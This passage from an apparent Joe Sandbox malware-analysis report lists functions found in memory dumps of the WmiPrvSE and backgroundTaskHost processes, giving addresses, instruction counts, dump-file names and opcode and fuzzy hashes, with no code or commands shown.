              Function 00007FFBACF4745D Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9bd9b9b061096c92c4341db46104dde305090b896cd3611b242a0cbb285bbdff
              • Instruction ID: 283c7cb3d24a6e45c6771420c22b21ad9ca6b3b76e404329fc07596d61933116
              • Opcode Fuzzy Hash: 9bd9b9b061096c92c4341db46104dde305090b896cd3611b242a0cbb285bbdff
              • Instruction Fuzzy Hash: 1E0171B080AA4ECFDB59EF74C5991BA7FA0FF55300F1004BFD80AC61A2DA76A544C750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF420F0 Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f496424a3208d43598a5d25826d9a8bd051924254b3310f02843cc0281b66fef
              • Instruction ID: af21d0bd5f9d9c8fcfb0a88406959f208265cd4bdca63a67d5eb93058f0161e7
              • Opcode Fuzzy Hash: f496424a3208d43598a5d25826d9a8bd051924254b3310f02843cc0281b66fef
              • Instruction Fuzzy Hash: 5701D6F9D1D55E8AE752AB78D89D1F93AE0EF94301F0505BADA08C2092DB25D44C8680
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3C538 Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465685674.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: de4f5f10964d61ed77a07a8a599f0a5c485faede4a5ae8e75c1cdb5e036b228f
              • Instruction ID: 0e2f8f18ac23360e393983e07c83158209a1f0d87791c9458aa7510457987a1f
              • Opcode Fuzzy Hash: de4f5f10964d61ed77a07a8a599f0a5c485faede4a5ae8e75c1cdb5e036b228f
              • Instruction Fuzzy Hash: F201ADF1C1964E9EEB96EE38C8092FE7FE0FF04301F00063AEC28C2291DB3195588690
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3745C Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465555280.00007FFBACF35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF35000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf35000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e71326f31f57ab75a0d8eb8d2add629c80779605403683d3befc74bf7cd0c5f3
              • Instruction ID: 9d3790ebf9dc8757ebb36994f171ef174df7dfcce4bd7a7986b26ee6708b1fb9
              • Opcode Fuzzy Hash: e71326f31f57ab75a0d8eb8d2add629c80779605403683d3befc74bf7cd0c5f3
              • Instruction Fuzzy Hash: 2511FAB4D0961A9FDBA6DB28C8847E9B3B4EB58301F1041E6D40DA3385DB399AC9CF44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3332A Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465448109.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 27eb517ad670b41bafae317b41d6ddc8d2bd54fca1b8a520cb96660d7d68a979
              • Instruction ID: 0b50dfd67930dfa667680b57ad41c61430372d74ba015c62ba3f0e81beed3a05
              • Opcode Fuzzy Hash: 27eb517ad670b41bafae317b41d6ddc8d2bd54fca1b8a520cb96660d7d68a979
              • Instruction Fuzzy Hash: F6017CB0D1851E9EEB91EB78C48C1F97AE4FF58300F504976D818C62A1EE34E5498740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3273D Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465448109.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6cbba395ca4100df0d6c79f479e1575a8e086d089cb0face0c2b1cf00d1be265
              • Instruction ID: 93bcf5b86c5b07b0c1c84102fb41ed88df0eb547a9226d15171d7123a2ef6152
              • Opcode Fuzzy Hash: 6cbba395ca4100df0d6c79f479e1575a8e086d089cb0face0c2b1cf00d1be265
              • Instruction Fuzzy Hash: 1B017CB091A64AAFE752EB78C84D1F97BE0FF59300F4148B6D828C71A2EA35E4488741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3A629 Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465685674.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2de0872fee8c06cb323761d3db865a26bc78018a6d8c63e54385347dc168bc62
              • Instruction ID: e76f702d9b8b35b6fbfb15f762007fa16e91e1108b8f5d8473549d2af67819f7
              • Opcode Fuzzy Hash: 2de0872fee8c06cb323761d3db865a26bc78018a6d8c63e54385347dc168bc62
              • Instruction Fuzzy Hash: 1E019EA0A0E6895EE752EB74885C1E93BF4EF19300F0509F3D818C71A2DA25E4488711
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF308EF Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465448109.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e451befc7e31469c7e3026c7983de6f17f10ca898bcc439f23fd1e3145ed0359
              • Instruction ID: 978268f43f7fc536934140c8285a0726a47e8e1bef3e5df2196d1d370b926e0e
              • Opcode Fuzzy Hash: e451befc7e31469c7e3026c7983de6f17f10ca898bcc439f23fd1e3145ed0359
              • Instruction Fuzzy Hash: 1E01D1B2D0990D5EEB89EB74C489AE9B7A1FF18310F454176C50AE7293CE24B94A8B50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF30200 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465448109.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 38e7fdf234760f1e4d7591f953e863eabc260c92fb0221a75b5cb9432486818a
              • Instruction ID: df85405f4a6b4ae83653ae37308292d2655df50d995d914435237af0423b9b5b
              • Opcode Fuzzy Hash: 38e7fdf234760f1e4d7591f953e863eabc260c92fb0221a75b5cb9432486818a
              • Instruction Fuzzy Hash: 95016DB091590E9AEB59EB34C4582FD77A0FF18305F50087EE82EC6292DF36A555CA10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF30208 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465448109.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f204579f7c3866b3b8d6fd86a2a7bac6e4d738061cadadcbce924dfc1fdfff04
              • Instruction ID: ae36721c1e1e5a11d8a7ae56228bab3b3cbdecd2ce608c069f8dde65acbfaecc
              • Opcode Fuzzy Hash: f204579f7c3866b3b8d6fd86a2a7bac6e4d738061cadadcbce924dfc1fdfff04
              • Instruction Fuzzy Hash: 08016DB0915A1E9EEB59EB74C45D2FA77A0FF18304F50087EE82EC2292DF36A154C610
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF317BD Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465448109.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dea6037e0c80028775f196f8ae7fd1e543439a3e0fb540e32a0c991c238d276f
              • Instruction ID: d07dd2e8d708fe105f2b8cfc4ba7108c8bb9e2de4a8a47a0b48c0308c5451dea
              • Opcode Fuzzy Hash: dea6037e0c80028775f196f8ae7fd1e543439a3e0fb540e32a0c991c238d276f
              • Instruction Fuzzy Hash: 9E01D1B080A68D8FDF95DF38C4596FA3BE0FF55301F4440BAE818C2292CA76D854C780
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF30D20 Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465448109.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 93ca6cc97806a96c822fd1f3b4bba4d92eaed208e6e70940a8c11863b82cc683
              • Instruction ID: 608362499b71376840131e42a17dacda64747ed30c4ffe56e554755a2728b649
              • Opcode Fuzzy Hash: 93ca6cc97806a96c822fd1f3b4bba4d92eaed208e6e70940a8c11863b82cc683
              • Instruction Fuzzy Hash: 69F0F4B1C2954EAAEB669678D80C3FD77E0FB55314F00057BD82DC1581CF7561488241
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF420F8 Relevance: .0, Instructions: 39COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 556c3abd86a645c3c8fc4ccdd4d555b239cf90401991ffd588560b9b75425cc0
              • Instruction ID: b6d215460951bbdc896e465f586d60190c175e86f0d9ac14f6d74974ce3542c0
              • Opcode Fuzzy Hash: 556c3abd86a645c3c8fc4ccdd4d555b239cf90401991ffd588560b9b75425cc0
              • Instruction Fuzzy Hash: 7BF0A4F8C1D55E8AE752AB78C89D1F93AE0EF54300F0104BADA48C2092EB25D4488640
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF301C8 Relevance: .0, Instructions: 39COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465448109.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7c6ab97faf5fdd3b63be9db7db0550500b4256c75de7b7a11b231b86c5afb584
              • Instruction ID: 79b011c8a9aa4595b43cf941916183e0211ad73aa0c7c5de9018791a7a6db254
              • Opcode Fuzzy Hash: 7c6ab97faf5fdd3b63be9db7db0550500b4256c75de7b7a11b231b86c5afb584
              • Instruction Fuzzy Hash: 4DF0AFB080950E9FEF95EE38D4492FA37A4EF15304F40443AE81DC2281CA76E494CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF46D93 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f04e9c30c860dd751830a5a4a01a0ed7674df398e41215c312ee2f75ede2c065
              • Instruction ID: 3ea8a4948f299595197ed4065924312948db2af89a313b05769d5a0218247b07
              • Opcode Fuzzy Hash: f04e9c30c860dd751830a5a4a01a0ed7674df398e41215c312ee2f75ede2c065
              • Instruction Fuzzy Hash: C5012CB5C0921ACFDF15CFA0D8856FC77B0AF18321F14023AD406A22C0CA396548DB54
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF33234 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465448109.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4fc5f1fc6d38a74272101f390c4150c0e6713b86ff91c73ebbab531dee28a06b
              • Instruction ID: 3da86813e847fd4fe00ff3fd9a2c353bcc4efeeb96c96fd1f5ead3e974831ee7
              • Opcode Fuzzy Hash: 4fc5f1fc6d38a74272101f390c4150c0e6713b86ff91c73ebbab531dee28a06b
              • Instruction Fuzzy Hash: BAF044F1D095199FEB59DA78C4986FC7BB1EF54300F105039D819923C2CA39958DDF50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF32659 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465448109.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2c250e4244521c6cecf9ae0e26a73c0dd281fd89a43f7f7af439da4c719a39b7
              • Instruction ID: fa6a66ff5c634be1dedf620a560b50ae43f78ec94715377de31ac945c7fc2a9e
              • Opcode Fuzzy Hash: 2c250e4244521c6cecf9ae0e26a73c0dd281fd89a43f7f7af439da4c719a39b7
              • Instruction Fuzzy Hash: 38F062B090E3899FE75A9B3488291E93FB0FF16201F4504BEE829C62D3DB699958C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3AD58 Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465685674.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c35c4d7b58bc364ef47162ecfa5305d02d7d4ac0baade19fca3eddfca797efdf
              • Instruction ID: 9607d64ad8160526fb72767a0d2b0a3ff4ced89dd1e5a1f9d1c47a5baf6d6271
              • Opcode Fuzzy Hash: c35c4d7b58bc364ef47162ecfa5305d02d7d4ac0baade19fca3eddfca797efdf
              • Instruction Fuzzy Hash: FEF031B094A51D9EEB52DB28C489BE9B7B1FF59300F5082A9C41DD3152CA3599858F40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF326CD Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465448109.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 92b96438484aba374e1e7cc483da28433f973e5ce0a021ad6844e9655ab245cc
              • Instruction ID: 2e33513bb3c37bb5a75aa1f9e5a265a09d0da8fc2b28aca7a0c87e4b39142664
              • Opcode Fuzzy Hash: 92b96438484aba374e1e7cc483da28433f973e5ce0a021ad6844e9655ab245cc
              • Instruction Fuzzy Hash: 58F0C2B080A38A5FE76A9B34882D2F93AA0FF05200F4004BAE829C5192DB399458C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF40580 Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 53f63b81762e5a7e081aff7096d394420d94055aee2e89f251834ecd4b26e74f
              • Instruction ID: 5a65aed9378fc79d16344d64624a4a81d8a38906c3584f35d85e8ab264fa46b3
              • Opcode Fuzzy Hash: 53f63b81762e5a7e081aff7096d394420d94055aee2e89f251834ecd4b26e74f
              • Instruction Fuzzy Hash: 84F03AB081995E9EEB95EF78C84D6FA76E0FF18300F40093AEC29C2190DB3095548B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF470A4 Relevance: .0, Instructions: 31COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 42442e584a7268693bc2a831efd2cd9b7bf53f6c24d15757a5796c3e3b0bb78d
              • Instruction ID: 2b3880802b53fd8b128249aa28c7802671c56d1cd161d6c9af7f2351817ac1ac
              • Opcode Fuzzy Hash: 42442e584a7268693bc2a831efd2cd9b7bf53f6c24d15757a5796c3e3b0bb78d
              • Instruction Fuzzy Hash: B5F05EB1E0845D8BEF04EBA8D4814FCB7F5EF98340F500036D109E7242CA28AA05CF50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF381D5 Relevance: .0, Instructions: 30COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465555280.00007FFBACF35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF35000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf35000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fcce33ddaa47779f76a5086490ed36447abe130eb5b013289bed44f0f14737b5
              • Instruction ID: 7a987844019845801fc093e3264467b9b143a31b8c01bdc0da03bc793c905526
              • Opcode Fuzzy Hash: fcce33ddaa47779f76a5086490ed36447abe130eb5b013289bed44f0f14737b5
              • Instruction Fuzzy Hash: 2CF0A9F4D0961A9FDBA6DB28C8487F9B7F4AB18301F1001E6941D92382CA399BC99F44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF36E0B Relevance: .0, Instructions: 26COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465555280.00007FFBACF35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF35000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf35000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e5088f5da93ebf5594b8c8dd6bb13cf76b259d2ba8076d18426de757a91cae7a
              • Instruction ID: 1fcbadfaf982311f79caedc1664e4ff340256703b6b2c8908709522c2b33e1a5
              • Opcode Fuzzy Hash: e5088f5da93ebf5594b8c8dd6bb13cf76b259d2ba8076d18426de757a91cae7a
              • Instruction Fuzzy Hash: D0F0FEF4D0961A9FDBA6DB28C8447E9B7F4EB18300F1001E5940DD3342CA349BC59F44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF43401 Relevance: .0, Instructions: 23COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aa42e9b19796a7e08efdeeb0a433f3b55ff914da6d000e83b800b2528b8fe5b4
              • Instruction ID: 9dc311045e26fc69bd3f563dcec1af025cd0c67696bf17ab9d29c570dfb04dee
              • Opcode Fuzzy Hash: aa42e9b19796a7e08efdeeb0a433f3b55ff914da6d000e83b800b2528b8fe5b4
              • Instruction Fuzzy Hash: 6DE0C270859A0C6BCB11AF69E8482D873B5FB48314F000639D80CD7041D73A9998C700
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3BA62 Relevance: .0, Instructions: 19COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000018.00000002.465685674.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ef33fd9f7a74b930893de0ab397cf34e537c179a896505af53d0efecad86fc2a
              • Instruction ID: 6d5fc07cf25d37f0e3624735fd2104bd2d61c0d6a46bcfd1c08da9e1adb468b4
              • Opcode Fuzzy Hash: ef33fd9f7a74b930893de0ab397cf34e537c179a896505af53d0efecad86fc2a
              • Instruction Fuzzy Hash: ACD0E2B5A0882DCF8F40EFE8D8041ECB3B0FB58301B000032D81DE3240CB20A8148B40
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Function 00007FFBACF407CF Relevance: 5.1, Strings: 4, Instructions: 120COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID: "$+$/$]
              • API String ID: 0-387013541
              • Opcode ID: 0aaa483b33cea8ad6999e080954f85a3de31984d38780b329e0a7fa5a542ca4b
              • Instruction ID: 2b0b2580bab97eaf025b1e0ed880e4f8746d776e9b37c48f09f86f0a49c7ff92
              • Opcode Fuzzy Hash: 0aaa483b33cea8ad6999e080954f85a3de31984d38780b329e0a7fa5a542ca4b
              • Instruction Fuzzy Hash: 5151E3B0D1562DCFEB69DB64C894BE9B7B2FF48301F1041A9D40DA7291DB39AA85CF00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF406E7 Relevance: 5.1, Strings: 4, Instructions: 88COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID: "$)$+$/
              • API String ID: 0-3570642953
              • Opcode ID: 9d47cc7c6f9f8f284273e54773ea8e5c4d859b6bd83d8c4631c5d020c2de061a
              • Instruction ID: 134295bf36de4a38f15a8cbcdfa849805eeb7f0279f2e256f2e2264616af025a
              • Opcode Fuzzy Hash: 9d47cc7c6f9f8f284273e54773ea8e5c4d859b6bd83d8c4631c5d020c2de061a
              • Instruction Fuzzy Hash: 8D41C8B0D0922D8FDB69DF24C9987F9B7B1BF54305F1041AAD44DA7291CB399A88DF01
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF40A47 Relevance: 5.1, Strings: 4, Instructions: 83COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000018.00000002.465880379.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_24_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID: &$/$[${
              • API String ID: 0-2536217607
              • Opcode ID: 457a6003c20e08f06fb1bc7589a9ee0d80fbc19394496472fa401207ef97e16d
              • Instruction ID: 61a702b30058154427464b06aad7668b7eef38b300493da55ff6c92ba1ae9d37
              • Opcode Fuzzy Hash: 457a6003c20e08f06fb1bc7589a9ee0d80fbc19394496472fa401207ef97e16d
              • Instruction Fuzzy Hash: A63184B0D0922A8BEB6DCF74D9987BDB6B2AF48315F10417ED41EA7281CB395984DF04
              Uniqueness

              Uniqueness Score: -1.00%

              Executed Functions

              Function 00007FFBACF52BF5 Relevance: .4, Instructions: 413COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b340fa096e581b0e216a138876573f2486e2dd267682fd844ec91d65fda181f3
              • Instruction ID: 2c6ec72696c61e77bc4f8aba3f21be94d402edfdae96c5291fee4f8dce5fa892
              • Opcode Fuzzy Hash: b340fa096e581b0e216a138876573f2486e2dd267682fd844ec91d65fda181f3
              • Instruction Fuzzy Hash: D0C1B8D7E0E19A0BE712A77CF8551F97FD09F42231B0402F7D68889097EE16DD8E86A1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF52C83 Relevance: .3, Instructions: 338COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f8f93523176c5a6989ee889469c25ca357c2f0d760e23738d5470875a6b476d4
              • Instruction ID: 6a17e98e00d0d5b1d45294e84d7099acfdcddf36104e953aee9f7425027daf19
              • Opcode Fuzzy Hash: f8f93523176c5a6989ee889469c25ca357c2f0d760e23738d5470875a6b476d4
              • Instruction Fuzzy Hash: C7A1D7D7E0F29A0BE712A77CFC591F97F90DF42221B0402B7D6888A497ED16DD4E8291
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF52CAA Relevance: .3, Instructions: 313COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6ee7147f20a27f11068c90a5fdff8a429b3d6056f554280ae6290e309502f5ae
              • Instruction ID: e8d3abf283c1737ec1e56142637ba1d39e2b5b7ad3cf5bc30f9005c26a34728a
              • Opcode Fuzzy Hash: 6ee7147f20a27f11068c90a5fdff8a429b3d6056f554280ae6290e309502f5ae
              • Instruction Fuzzy Hash: EA91C5D3A0F29A0BE752977CBC591F97F90DF42221B0802B7D6888A497ED16DD4E8291
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5468D Relevance: .3, Instructions: 256COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c16ff82c60eebf597fae1928815fe90f24eb3646614e685072cbe64e559e2c96
              • Instruction ID: d9b681425ba1b217ec4201ce4e798ab4be377ce4dbe086ffc1017228d02e9282
              • Opcode Fuzzy Hash: c16ff82c60eebf597fae1928815fe90f24eb3646614e685072cbe64e559e2c96
